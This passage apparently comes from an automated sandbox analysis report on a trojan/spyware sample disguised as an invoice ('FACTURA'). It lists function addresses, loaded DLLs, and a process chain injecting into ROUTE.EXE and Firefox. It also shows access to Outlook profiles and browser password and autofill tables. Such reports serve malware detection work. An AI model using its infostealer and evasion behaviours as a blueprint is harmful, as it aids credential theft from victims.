    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0347CF004_2_0347CF00
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_03476FE04_2_03476FE0
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0352EFBF4_2_0352EFBF
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034B2E484_2_034B2E48
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_03490E504_2_03490E50
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_03510E6D4_2_03510E6D
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_03462EE84_2_03462EE8
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_03520EAD4_2_03520EAD
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_03470D694_2_03470D69
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0346AD004_2_0346AD00
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_03482DB04_2_03482DB0
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0351EC4C4_2_0351EC4C
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0352EC604_2_0352EC60
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_03526C694_2_03526C69
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_03460C124_2_03460C12
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0347AC204_2_0347AC20
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034EEC204_2_034EEC20
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_03488CDF4_2_03488CDF
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0353ACEB4_2_0353ACEB
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0352F3304_2_0352F330
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034613804_2_03461380
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0352124C4_2_0352124C
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0345D2EC4_2_0345D2EC
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034B717A4_2_034B717A
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0345F1134_2_0345F113
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0350D1304_2_0350D130
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034751C04_2_034751C0
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0348B1E04_2_0348B1E0
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0347B0D04_2_0347B0D0
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_035270F14_2_035270F1
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A508C4_2_034A508C
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0351D6464_2_0351D646
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0350D62C4_2_0350D62C
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034E36EC4_2_034E36EC
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0352F6F64_2_0352F6F6
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_035275C64_2_035275C6
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0352F5C94_2_0352F5C9
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_035054904_2_03505490
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034DD4804_2_034DD480
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034ADB194_2_034ADB19
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0352FB2E4_2_0352FB2E
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_03501B804_2_03501B80
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0352FA894_2_0352FA89
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0348FAA04_2_0348FAA0
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034B59C04_2_034B59C0
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034399E84_2_034399E8
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0352F8724_2_0352F872
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034798704_2_03479870
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0348B8704_2_0348B870
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034E58704_2_034E5870
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034738004_2_03473800
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_035218DA4_2_035218DA
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_035278F34_2_035278F3
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034E98B24_2_034E98B2
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034EFF404_2_034EFF40
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0352FF634_2_0352FF63
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_03521FC64_2_03521FC6
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_03529ED24_2_03529ED2
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_03471EB24_2_03471EB2
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_03527D4C4_2_03527D4C
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0352FD274_2_0352FD27
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_03479DD04_2_03479DD0
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0350FDF44_2_0350FDF4
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_03473C604_2_03473C60
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034F7CE84_2_034F7CE8
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0348FCE04_2_0348FCE0
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_03509C984_2_03509C98
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0331F0614_2_0331F061
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0331E3844_2_0331E384
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0331E79D4_2_0331E79D
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0331E4A34_2_0331E4A3
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0331CB984_2_0331CB98
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0331D9084_2_0331D908
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: String function: 35475050 appears 37 times
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: String function: 35487BE4 appears 98 times
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: String function: 354AE692 appears 86 times
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: String function: 3542B910 appears 272 times
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: String function: 354BEF10 appears 104 times
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: String function: 0345B910 appears 275 times
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: String function: 034B7BE4 appears 100 times
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: String function: 034DE692 appears 86 times
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: String function: 034A5050 appears 56 times
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: String function: 034EEF10 appears 105 times
    Source: FACTURA A-7507_H1758.exe, 00000002.00000002.26722750004.00000000356D0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs FACTURA A-7507_H1758.exe
    Source: FACTURA A-7507_H1758.exe, 00000002.00000002.26711858259.0000000004F51000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameroute.exej% vs FACTURA A-7507_H1758.exe
    Source: FACTURA A-7507_H1758.exe, 00000002.00000003.26611799696.00000000351BB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs FACTURA A-7507_H1758.exe
    Source: FACTURA A-7507_H1758.exe, 00000002.00000003.26615161368.000000003537C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs FACTURA A-7507_H1758.exe
    Source: FACTURA A-7507_H1758.exe, 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs FACTURA A-7507_H1758.exe
    Source: FACTURA A-7507_H1758.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: classification engineClassification label: mal96.troj.spyw.evad.winEXE@7/10@18/15
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 0_2_004033B6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033B6
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 0_2_004046DD GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004046DD
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 0_2_00402095 LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,0_2_00402095
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\kolonibestyrernesJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeFile created: C:\Users\user\AppData\Local\Temp\nsr3F9D.tmpJump to behavior
    Source: FACTURA A-7507_H1758.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: ROUTE.EXE, 00000004.00000002.30464673785.0000000007CB3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
    Source: ROUTE.EXE, 00000004.00000002.30460295215.0000000002F28000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000004.00000003.26881340034.0000000002F48000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000004.00000002.30460295215.0000000002F48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
    Source: ROUTE.EXE, 00000004.00000003.26889367168.0000000007D0B000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000004.00000002.30464673785.0000000007D17000.00000004.00000020.00020000.00000000.sdmp, E-1658-o.4.drBinary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
    Source: FACTURA A-7507_H1758.exeReversingLabs: Detection: 36%
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeFile read: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\FACTURA A-7507_H1758.exe "C:\Users\user\Desktop\FACTURA A-7507_H1758.exe"
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeProcess created: C:\Users\user\Desktop\FACTURA A-7507_H1758.exe "C:\Users\user\Desktop\FACTURA A-7507_H1758.exe"
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exeProcess created: C:\Windows\SysWOW64\ROUTE.EXE "C:\Windows\SysWOW64\ROUTE.EXE"
    Source: C:\Windows\SysWOW64\ROUTE.EXEProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeProcess created: C:\Users\user\Desktop\FACTURA A-7507_H1758.exe "C:\Users\user\Desktop\FACTURA A-7507_H1758.exe"Jump to behavior
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exeProcess created: C:\Windows\SysWOW64\ROUTE.EXE "C:\Windows\SysWOW64\ROUTE.EXE"Jump to behavior
    Source: C:\Windows\SysWOW64\ROUTE.EXEProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeSection loaded: edgegdi.dllJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeSection loaded: oleacc.dllJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeSection loaded: shfolder.dllJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeSection loaded: riched20.dllJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeSection loaded: usp10.dllJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeSection loaded: msls31.dllJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeSection loaded: msi.dllJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeSection loaded: wkscli.dllJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeSection loaded: edgegdi.dllJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeSection loaded: msi.dllJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: wininet.dllJump to behavior
    Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: edgegdi.dllJump to behavior
    Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: ieframe.dllJump to behavior
    Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: wkscli.dllJump to behavior
    Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: secur32.dllJump to behavior
    Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: mlang.dllJump to behavior
    Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: propsys.dllJump to behavior
    Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: winsqlite3.dllJump to behavior
    Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: vaultcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: cryptbase.dllJump to behavior
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
    Source: C:\Windows\SysWOW64\ROUTE.EXEKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
    Source: FACTURA A-7507_H1758.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Binary string: route.pdb source: FACTURA A-7507_H1758.exe, 00000002.00000002.26711858259.0000000004F51000.00000004.00000020.00020000.00000000.sdmp, vCWtwarpbXUl.exe, 00000003.00000003.29557511884.0000000000EAB000.00000004.00000001.00020000.00000000.sdmp
    Source: Binary string: mshtml.pdb source: FACTURA A-7507_H1758.exe, 00000002.00000001.26330069368.0000000000649000.00000020.00000001.01000000.00000005.sdmp
    Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: vCWtwarpbXUl.exe, 00000003.00000002.30689807826.000000000077E000.00000002.00000001.01000000.00000008.sdmp, vCWtwarpbXUl.exe, 00000005.00000000.26765175851.000000000077E000.00000002.00000001.01000000.00000008.sdmp
    Source: Binary string: wntdll.pdbUGP source: FACTURA A-7507_H1758.exe, 00000002.00000003.26611799696.0000000035098000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26615161368.000000003524F000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000004.00000003.26700487716.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000004.00000003.26703715181.000000000327C000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000004.00000002.30462678996.0000000003430000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000004.00000002.30462678996.000000000355D000.00000040.00001000.00020000.00000000.sdmp
    Source: Binary string: wntdll.pdb source: FACTURA A-7507_H1758.exe, FACTURA A-7507_H1758.exe, 00000002.00000003.26611799696.0000000035098000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26615161368.000000003524F000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, ROUTE.EXE, 00000004.00000003.26700487716.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000004.00000003.26703715181.000000000327C000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000004.00000002.30462678996.0000000003430000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000004.00000002.30462678996.000000000355D000.00000040.00001000.00020000.00000000.sdmp
    Source: Binary string: mshtml.pdbUGP source: FACTURA A-7507_H1758.exe, 00000002.00000001.26330069368.0000000000649000.00000020.00000001.01000000.00000005.sdmp
    Source: Binary string: route.pdbGCTL source: FACTURA A-7507_H1758.exe, 00000002.00000002.26711858259.0000000004F51000.00000004.00000020.00020000.00000000.sdmp, vCWtwarpbXUl.exe, 00000003.00000003.29557511884.0000000000EAB000.00000004.00000001.00020000.00000000.sdmp

    Data Obfuscation

    barindex
    Source: Yara matchFile source: 00000000.00000002.26333481443.00000000047A5000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354097A1 push es; iretd 2_2_354097A8
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354021AD pushad ; retf 0004h2_2_3540223F
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354308CD push ecx; mov dword ptr [esp], ecx2_2_354308D6
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exeCode function: 3_2_03A68196 push ebp; retf 3_2_03A681AB
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exeCode function: 3_2_03A5F1DA push A1F3ED28h; ret 3_2_03A5F1FE
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exeCode function: 3_2_03A61142 push edi; retf 3_2_03A6114B
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exeCode function: 3_2_03A568EA pusha ; iretd 3_2_03A568F4
